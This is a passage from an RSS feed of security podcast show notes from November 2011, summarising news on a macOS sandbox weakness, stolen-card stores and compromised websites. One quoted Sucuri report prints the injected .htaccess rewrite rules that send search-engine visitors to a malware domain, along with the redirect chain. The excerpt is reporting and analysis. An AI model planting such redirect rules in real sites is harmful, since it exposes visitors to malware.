<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;An additional risk with these profiles is that they are supposed to provide an example of how a process should be restricted in different scenarios. If the no-network profile allows Apple-script events, this may result in new applications using the same restriction rules, therefore offering a false sense of security,&quot; the Core Security researchers said in their advisory.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company claims to have notified Apple&#39;s product security team on Sept. 20 and was told that this is not a security issue because the sandbox documentation doesn&#39;t state that Apple events will be prohibited when using this profile.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Core Security, Apple is considering modifying the documentation in order to make it clearer that restrictions enforced by a sandbox profile only apply to the processes that use it. Apple did not return a request for comment on its plans regarding this issue.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, back in 2008, security researcher Charlie Miller demonstrated a very similar attack and the company responded at the time by restricting the use of Apple events for the affected sandbox profiles.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is a simple workaround for Core Security&#39;s proof-of-concept exploit, said Paul Ducklin, the head of technology for the Asia Pacific region at antivirus firm Sophos. It involves denying access to &quot;/usr/bin/osascript&quot; when defining the sandbox for an application.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blog.sucuri.net/2011/11/htaccess-redirection-to-sweepstakesandcontestsinfo-dot-com.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog.sucuri.net/2011/11/htaccess-redirection-to-sweepstakesandcontestsinfo-dot-com.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week we started to see a large increase in the number of sites compromised with a .htaccess redirection to </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This domain has been used to distribute malware for a while (generally through javascript injections), but only in the last few days did we start seeing it being done via .htaccess.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">* The malicious site(s) are not blacklisted by Google (or any major blacklist) at this time, so it makes spreading the malware pretty simple for the attackers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is what gets added to the .htaccess of the compromised sites:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&lt;IfModule mod_rewrite.c&gt;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">RewriteEngine On</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">RewriteOptions inherit</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&lt;/IfModule&gt;</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In short, anyone that visits the compromised sites from a search engine will get redirected (and some times have their personal computer compromised). This is what happens via the browser of the visitor:</span></p>
<ol>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Visits compromised site by clicking from a search engine</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Browser is redirected to sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 (and variations</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Browser is redirected to http://www4.personaltr-scaner.rr.nu/?gue5mx=i%2BrOmaqtppWomd%2FXxa.. (or www3.bustdy.in or www3.strongdefenseiz.in and variations)</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Browser is again redirected to http://rdr.cz.cc/go.php?6&amp;uid=7&amp;isRedirected=1 (and other domains)</span></li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-522-cc-underground-drive-shortage-4chan-os-x-sandbox-sweepstakesandcontestsinfo/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3130/0/infosec-daily-podcast-episode522.mp3" length="22688200" type="audio/mpeg" />
		<itunes:duration>0:00:01</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 522 for November 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan
Announcements:
	Caption Contest. Gives us your best and worst caption or P[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 522 for November 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan
Announcements:
	Caption Contest. Gives us your best and worst caption or PhotoShopped version: &#160;http://pic.twitter.com/SovbFcbE
Brad Smith (theNurse) and his stroke at Hacker Halted:
We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
You don't have a sufficient version of Flash Player to display this animation.
Stories:
	Source: http://blogs.rsa.com/aharoni/underground-forums-open-official-credit-card-stores
Automated CC stores websites offer fraudsters an automatic way of buying stolen credit cards &#8211; simply fund an account with e-currency, choose which type of card you would like, pay and receive the full credential. Their popularity has reached such a fever pitch, CC store kits are traded in the underground in the same fashion as phishing kits. Very few respectful vendors are without one. In a recent post on his blog, Dancho Danchev exposed some of the stores, providing a glimpse into this booming market. Recently, we&#8217;ve encountered a new development in the underground in regards to these sites &#8211; forums opening &#8220;official&#8221; stores.
	In the old days when a fraudster was interested in selling credit cards, he had to join a forum and be formally inducted by other forum members who would vouch for him. This process required him to send a few sample cards to the forum&#8217;s moderators, who tested the cards and wrote a review. If the fraudster passed the review, he&#8217;d get a &#8220;verified vendor&#8221; status &#8211; a stamp of approval by the forum that the vendor is indeed legit. This process was put into place mainly because of the high volume of forum members that used to rip off other fraudsters, &#8220;rippers&#8221; in fraudster terminology. However, when the CC store fad started, vendors moved their business out of the walled garden of the forum. While this protected the vendors from any rippers masquerading as buyers (as everything is automatic and there&#8217;s no way a ripper can beg for free samples), it didn&#8217;t protect the buyers. Picking up on the trend, &#8220;rippers&#8221; started building their own stores &#8211; fake ones &#8211; that required an initial fee to get into them. Once this fee is paid, the ruse was exposed and the ripped off buyer realized that the store never existed.
Source: &#160;http://www.infoworld.com/d/computer-hardware/hard-drive-shortages-will-result-in-more-expensive-pcs-says-gartner-178913
Enterprise users and consumers who have held off buying new PCs recently may come to regret their decision as a hard-drive shortage following floods in Thailand is expected to result in higher pric[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 521 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-521-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-521-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 13 Nov 2011 04:00:31 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3127</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 521 for November 12, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad. Guests: Warrax, Hackett, Spridel, and Oncee. Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.2804693245222568" style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 521 for November 12, 2011. &nbsp;Tonight&#39;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Guests: Warrax, Hackett, Spridel, and Oncee.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.infosecisland.com/blogview/18077-FBI-Claims-Biggest-Cybercrime-Takedown-in-History.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.infosecisland.com/blogview/18077-FBI-Claims-Biggest-Cybercrime-Takedown-in-History.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://lists.immunityinc.com/pipermail/dailydave/2011-November/000361.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://lists.immunityinc.com/pipermail/dailydave/2011-November/000361.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hide yo kids, hide yo wife, they hackin&rsquo; everbody.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://arstechnica.com/tech-policy/news/2011/11/the-borderless-internet-is-officially-dead.ars"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/tech-policy/news/2011/11/the-borderless-internet-is-officially-dead.ars</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://arstechnica.com/microsoft/news/2011/11/why-microsoft-authorized-a-9-windows-phone-jailbreak.ars"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/microsoft/news/2011/11/why-microsoft-authorized-a-9-windows-phone-jailbreak.ars</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.pcadvisor.co.uk/news/security/3316651/smartphone-malware-surges-by-800-in-four-months/?olo=rss"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/security/3316651/smartphone-malware-surges-by-800-in-four-months/?olo=rss</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://convergence.io/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://convergence.io/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;ve released Convergence 0.08, with support for Firefox 8 and client certificates!</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.schneier.com/blog/archives/2011/11/weaponized_uav.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.schneier.com/blog/archives/2011/11/weaponized_uav.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.copblock.org/9916/the-police-state-grows-tsa-expands-past-airports/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.copblock.org/9916/the-police-state-grows-tsa-expands-past-airports/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://yro.slashdot.org/story/11/11/12/1738201/judges-makes-divorcing-couple-swap-facebook-passwords"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://yro.slashdot.org/story/11/11/12/1738201/judges-makes-divorcing-couple-swap-facebook-passwords</span></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-521-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3127/0/infosec-daily-podcast-episode521.mp3.mp3" length="79385337" type="audio/mpeg" />
		<itunes:duration>0:55:08</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 521 for November 12, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.
	Guests: Warrax, Hackett, Spridel, and Oncee.

	Brad Smith (theNurse) and his stroke at Hacker Halted:
	W[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 521 for November 12, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.
	Guests: Warrax, Hackett, Spridel, and Oncee.

	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/

	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://www.infosecisland.com/blogview/18077-FBI-Claims-Biggest-Cybercrime-Takedown-in-History.html
	Source: https://lists.immunityinc.com/pipermail/dailydave/2011-November/000361.html
	Hide yo kids, hide yo wife, they hackin&#8217; everbody.
	Source: http://arstechnica.com/tech-policy/news/2011/11/the-borderless-internet-is-officially-dead.ars
	Source: http://arstechnica.com/microsoft/news/2011/11/why-microsoft-authorized-a-9-windows-phone-jailbreak.ars
	Source: http://www.pcadvisor.co.uk/news/security/3316651/smartphone-malware-surges-by-800-in-four-months/?olo=rss
	Source: http://convergence.io/
	We&#39;ve released Convergence 0.08, with support for Firefox 8 and client certificates!
	Source: https://www.schneier.com/blog/archives/2011/11/weaponized_uav.html
	Source: http://www.copblock.org/9916/the-police-state-grows-tsa-expands-past-airports/
	Source: http://yro.slashdot.org/story/11/11/12/1738201/judges-makes-divorcing-couple-swap-facebook-passwords</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 520 &#8211; Interview with Bruce Potter (@gdead)</title>
		<link>http://www.isdpodcast.com/episode-520-interview-with-bruce-potter-gdead</link>
		<comments>http://www.isdpodcast.com/episode-520-interview-with-bruce-potter-gdead#comments</comments>
		<pubDate>Sat, 12 Nov 2011 02:10:06 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3122</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 520 for November 11, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma. Special Guest: Bruce Potter Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 520 for November 11, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Special Guest: Bruce Potter</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
